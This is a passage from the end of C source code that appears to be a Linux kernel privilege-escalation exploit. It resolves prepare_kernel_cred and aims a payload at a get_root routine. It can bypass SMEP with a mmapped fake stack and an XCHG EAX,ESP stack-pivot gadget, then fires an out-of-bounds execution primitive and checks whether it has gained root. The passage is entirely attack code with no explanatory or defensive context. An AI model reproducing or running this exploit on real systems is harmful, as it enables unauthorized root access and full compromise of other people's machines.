  556. printf("[.] prepare_kernel_cred: %lx\n", PREPARE_KERNEL_CRED);
  557. unsigned long payload = (unsigned long)&get_root;
  558. #if ENABLE_SMEP_BYPASS
  559. printf("[.] SMEP bypass enabled, mmapping fake stack\n");
  560. mmap_stack();
  561. payload = XCHG_EAX_ESP_RET;
  562. printf("[~] done, fake stack mmapped\n");
  563. #endif
  564. printf("[.] executing payload %lx\n", payload);
  565. oob_execute(payload);
  566. printf("[~] done, should be root now\n");
  567. check_root();
  568. return 0;
  569. }
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